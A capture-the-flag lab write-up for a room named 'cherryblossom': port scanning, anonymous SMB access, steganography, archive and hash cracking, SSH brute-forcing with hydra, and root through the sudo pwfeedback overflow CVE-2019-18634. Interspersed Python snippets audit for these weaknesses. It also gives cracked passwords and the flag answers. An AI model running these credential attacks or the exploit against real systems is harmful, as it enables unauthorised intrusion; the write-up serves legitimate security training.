Port scanning

sudo nmap --min-rate 10000 -p- 10.10.2.67     
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 14:47 UTC
Nmap scan report for 10.10.2.67
Host is up (0.24s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
sudo nmap -sT -sV -sC -O -p22,139,445 10.10.2.67
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 14:49 UTC
Nmap scan report for 10.10.2.67
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 21:ee:30:4f:f8:f7:9f:32:6e:42:95:f2:1a:1a:04:d3 (RSA)
| 256 dc:fc:de:d6:ec:43:61:00:54:9b:7c:40:1e:8f:52:c4 (ECDSA)
|_ 256 12:81:25:6e:08:64:f6:ef:f5:0c:58:71:18:38:a5:c6 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (95%), Linux 3.16 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 3.11 (92%), Linux 3.18 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: cherryblossom
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: cherryblossom
|_ System time: 2023-10-10T15:49:27+01:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -20m00s, deviation: 34m38s, median: -1s
| smb2-time:
| date: 2023-10-10T14:49:28
|_ start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.79 seconds

Port 22 (SSH) and the SMB ports are open.
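As an added example (not part of the original writeup), here is a small Python parser for nmap's `-sV -sC` text output that pulls the open ports into a table and flags the two SMB hardening gaps the scan above reports: signing "enabled but not required" on SMB2 and a guest account being accepted. The sample text is a constructed excerpt in nmap's layout, not a live scan.

```python
import re

# Constructed excerpt in the layout of `nmap -sV -sC` output (sample input, not a live scan).
SAMPLE_SCAN = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
"""

# One row of nmap's port table: "<port>/<proto>  <state>  <service>  <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return (port, state, service, version) tuples for every row of the port table."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(3), m.group(4), m.group(5).strip()))
    return ports


def smb_findings(text):
    """Flag weak settings reported by the smb-security-mode / smb2-security-mode NSE scripts."""
    findings = []
    script = None
    for line in text.splitlines():
        body = line.lstrip("|_ ").strip()  # drop nmap's "| " / "|_ " script-output gutter
        # A script header looks like "smb2-security-mode:" (name with a hyphen, trailing colon).
        if body.endswith(":") and "-" in body and not body[0].isdigit():
            script = body[:-1]
            continue
        if script == "smb2-security-mode" and "not required" in body:
            findings.append("SMB2 signing not required (relay exposure)")
        elif script == "smb-security-mode":
            if body.startswith("account_used: guest"):
                findings.append("Guest account accepted (anonymous access)")
            elif body.startswith("message_signing: disabled"):
                findings.append("SMB1 signing disabled")
    return findings


def audit(text):
    """Combine both views into one report dict."""
    return {"ports": parse_ports(text), "findings": smb_findings(text)}


if __name__ == "__main__":
    for item in audit(SAMPLE_SCAN)["findings"]:
        print("FINDING:", item)
```

The fix on the server side is `server signing = mandatory` in smb.conf and disabling guest/anonymous access to shares that do not need it; the parser only identifies which hosts still report the weak settings.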

SMB

smbclient -L cherry.thm

There is an Anonymous share.

smbclient \\\\cherry.thm\\Anonymous

It can be accessed without a password.

It contains a journal.txt; the GET times out, so raise the timeout.

smbclient \\\\cherry.thm\\Anonymous -t 500

After a long wait the GET finally finishes; one look at the contents and it's no wonder it timed out.

Steg

Obviously base64.

cat journal.txt|base64 -d >journal
file journal

It's a PNG image, and the room hints at steganography.

mv journal journal.png
pip install stegpy

Use stegpy, which supports PNG steganography.

stegpy journal.png

This yields a ZIP, but extracting it reports the file is corrupted. Opening it in 010 Editor shows the file header was changed to a JPEG one; change it back to the ZIP header 504B0301, and extraction then asks for a password.
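As an added example (not part of the original writeup), the header-swap trick above done in Python: identify a file by its magic bytes, and when a ZIP's local file header has been overwritten but its central directory at the end is intact, rewrite the signature and verify the archive really reads. The standard ZIP local-file-header signature is 50 4B 03 04. The sample is a ZIP constructed in memory and then tampered with; unlike the challenge file it is not password-protected.

```python
import io
import zipfile

# Well-known signatures for the formats that appear in this challenge.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"PK\x03\x04": "zip",            # ZIP local file header: 50 4B 03 04
    b"\xff\xd8\xff": "jpeg",
    b"7z\xbc\xaf\x27\x1c": "7z",
}


def identify(data):
    """Return the format whose signature matches the start of data, else 'unknown'."""
    for sig, name in MAGIC.items():
        if data.startswith(sig):
            return name
    return "unknown"


def repair_zip_header(data):
    """Restore the local-file-header signature if only the first bytes were overwritten.

    zipfile.is_zipfile() checks the end-of-central-directory record at the tail of the
    file, so it still succeeds when the header is damaged; that is exactly the case a
    signature rewrite can fix. Anything else is real corruption and is refused."""
    if data.startswith(b"PK\x03\x04"):
        return data
    if not zipfile.is_zipfile(io.BytesIO(data)):
        raise ValueError("no ZIP central directory found; not just a header swap")
    return b"PK\x03\x04" + data[4:]


def read_first_member(data):
    """Read the first member; raises zipfile.BadZipFile if the local header is wrong."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(zf.namelist()[0])


def is_readable(data):
    """True if the archive opens and its first member can be extracted."""
    try:
        read_first_member(data)
        return True
    except zipfile.BadZipFile:
        return False


def build_tampered_sample():
    """Constructed sample: a real ZIP whose first four bytes are replaced by a JPEG signature."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Journal.ctz", b"constructed inner payload")
    good = buf.getvalue()
    return b"\xff\xd8\xff\xe0" + good[4:]


if __name__ == "__main__":
    tampered = build_tampered_sample()
    print("before:", identify(tampered), "readable:", is_readable(tampered))
    fixed = repair_zip_header(tampered)
    print("after: ", identify(fixed), "readable:", is_readable(fixed))
```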

fcrackzip -uDp /usr/share/wordlists/rockyou.txt _journal.zip

Use rockyou, the wordlist everyone abroad seems to favour.

Password: september

file Journal.ctz

Identified as 7-Zip? And password-protected again; nested archives, of course.

mv Journal.ctz Journal.7z
7z2john Journal.7z >hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Password: tigerlily

It's an XML journal? CherryTree opens it in a human-readable format; it contains a few little essays, lol.

The first flag is at the very bottom.

THM{054a8f1db7618f8f6a41a0b3349baa11}

Getting a shell

The journal mentions cherry-blossom.list; save it.

hydra -l lily -P cherry-blossom.list ssh://cherry.thm

Brute-force SSH (the only way in); the username should be lily, and the password comes out as Mr.$un$hin3

Lateral movement

There is another user, johan.

Nothing obvious, so upload linpeas.

There is a shadow backup at /var/backups/shadow.bak

Copy johan's hash and crack it with the wordlist from earlier.

echo '$6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG.vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0' >hash

https://hashcat.net/wiki/doku.php?id=example_hashes

Look up the hash type: hashcat mode 1800.

hashcat -m 1800 -a 0 hash cherry-blossom.list

Password: ##scuffleboo##
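As an added example (not part of the original writeup), the two things a defender would check after this finding, in Python: what a `$6$...` shadow entry actually is (the `$id$` prefix of the crypt(3) modular format selects the algorithm, and `$6$` is sha512crypt, hashcat's mode 1800), and whether a shadow backup is readable by anyone but root, which is the real bug here. The shadow line reuses the hash from this writeup with constructed aging fields; the permission check runs on a throwaway temp file.

```python
import os
import stat
import tempfile

# crypt(3) ids handled here (the sha-crypt family) and their hashcat modes.
HASH_IDS = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
}

# Constructed shadow line: the hash is the one from this writeup, the aging fields are made up.
SAMPLE_SHADOW_LINE = (
    "johan:$6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG."
    "vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0:19000:0:99999:7:::"
)


def parse_crypt_hash(field):
    """Split '$id$[rounds=N$]salt$digest' into its parts and name the algorithm."""
    if not field.startswith("$"):
        raise ValueError("not a crypt(3) hash (locked or empty password field?)")
    parts = field.split("$")[1:]  # e.g. ['6', 'zV7zbU1b', 'digest']
    hid = parts[0]
    rounds = None
    if parts[1].startswith("rounds="):          # optional explicit round count
        rounds = int(parts[1][len("rounds="):])
        parts = [hid] + parts[2:]
    if hid not in HASH_IDS or len(parts) != 3:
        raise ValueError("unsupported or malformed hash id %r" % hid)
    name, mode = HASH_IDS[hid]
    return {"id": hid, "algorithm": name, "hashcat_mode": mode,
            "rounds": rounds, "salt": parts[1], "digest": parts[2]}


def parse_shadow_line(line):
    """Return (username, hash info) for one /etc/shadow record."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 9:
        raise ValueError("shadow line needs 9 colon-separated fields")
    return fields[0], parse_crypt_hash(fields[1])


def readable_by_others(path):
    """True if group or world read bits are set; shadow and its backups should be 0600/0640 root."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def demo_backup_check():
    """Create a temp file, first with the loose mode a leaked backup often has, then tightened."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o644)
        loose = readable_by_others(path)
        os.chmod(path, 0o600)
        tight = readable_by_others(path)
    finally:
        os.unlink(path)
    return loose, tight


if __name__ == "__main__":
    user, info = parse_shadow_line(SAMPLE_SHADOW_LINE)
    print(user, info["algorithm"], "hashcat -m", info["hashcat_mode"], "salt", info["salt"])
    print("loose/tight readable-by-others:", demo_backup_check())
```

On a real host the same `readable_by_others` check would be run over `/var/backups/shadow*` (and any other copies an admin or backup job left behind), which is the cheap fix that closes this path.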

Switch to johan.

Second flag

THM{cb064113d54e24dc84f26b1f63bf3098}

Privilege escalation

sudo itself is vulnerable, though the exploits found by searching for the version number didn't seem to work. The intended route: when you run sudo -l and type the password, the password is echoed as asterisks.

This is CVE-2019-18634, apparently a buffer overflow; I don't really understand it.

https://github.com/saleemrashid/sudo-cve-2019-18634

gcc -static -o exp exploit.c

Compile it on Kali and upload it.

chmod +x exp

Run ./exp

Privilege escalation succeeded.
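As an added example (not part of the original writeup or the linked exploit repository), a defender-side audit for this bug in Python: CVE-2019-18634 needs two things at once, a sudo version before 1.8.31 (the sudo.ws advisory fixes it there; 1.8.26 to 1.8.30 contain the bug but are not exploitable) and the `pwfeedback` option enabled in sudoers, which is exactly what the asterisks on password entry reveal. The banner and sudoers text are constructed samples in the format of `sudo -V` and `/etc/sudoers`; the parser handles plain `Defaults` lines only, not the `Defaults:user` / `Defaults@host` variants.

```python
import re

# sudo 1.8.31 fixed CVE-2019-18634 (sudo.ws pwfeedback advisory).
FIXED_VERSION = (1, 8, 31)

# Constructed samples: a `sudo -V` banner and a sudoers excerpt with pwfeedback turned on.
SAMPLE_BANNER = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SAMPLE_SUDOERS = """\
# constructed sudoers excerpt
Defaults        env_reset
Defaults        mail_badpass
Defaults        pwfeedback
root    ALL=(ALL:ALL) ALL
"""
HARDENED_SUDOERS = SAMPLE_SUDOERS.replace("Defaults        pwfeedback",
                                          "Defaults        !pwfeedback")


def parse_sudo_version(banner):
    """Extract (major, minor, patch) from 'Sudo version 1.8.21p2'; the pN suffix is ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("unrecognised sudo -V banner")
    return tuple(int(x) for x in m.groups())


def pwfeedback_enabled(sudoers_text):
    """True if a plain 'Defaults' line enables pwfeedback and no later line disables it."""
    enabled = False
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line.startswith("Defaults"):
            continue
        rest = line[len("Defaults"):]
        if rest and rest[0] not in " \t":         # skip Defaults:user / Defaults@host forms
            continue
        for opt in (o.strip() for o in rest.split(",")):
            if opt == "pwfeedback":
                enabled = True
            elif opt == "!pwfeedback":
                enabled = False
    return enabled


def is_vulnerable(banner, sudoers_text):
    """Both conditions must hold for CVE-2019-18634 to apply."""
    return parse_sudo_version(banner) < FIXED_VERSION and pwfeedback_enabled(sudoers_text)


if __name__ == "__main__":
    print("version:", parse_sudo_version(SAMPLE_BANNER))
    print("as shipped:", is_vulnerable(SAMPLE_BANNER, SAMPLE_SUDOERS))
    print("with !pwfeedback:", is_vulnerable(SAMPLE_BANNER, HARDENED_SUDOERS))
```

Either half of the fix is enough: upgrade sudo to 1.8.31 or later, or remove `pwfeedback` (or add `Defaults !pwfeedback`) in sudoers; the audit reports vulnerable only when neither has been done.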

root.txt

THM{d4b5e228a567288d12e301f2f0bf5be0}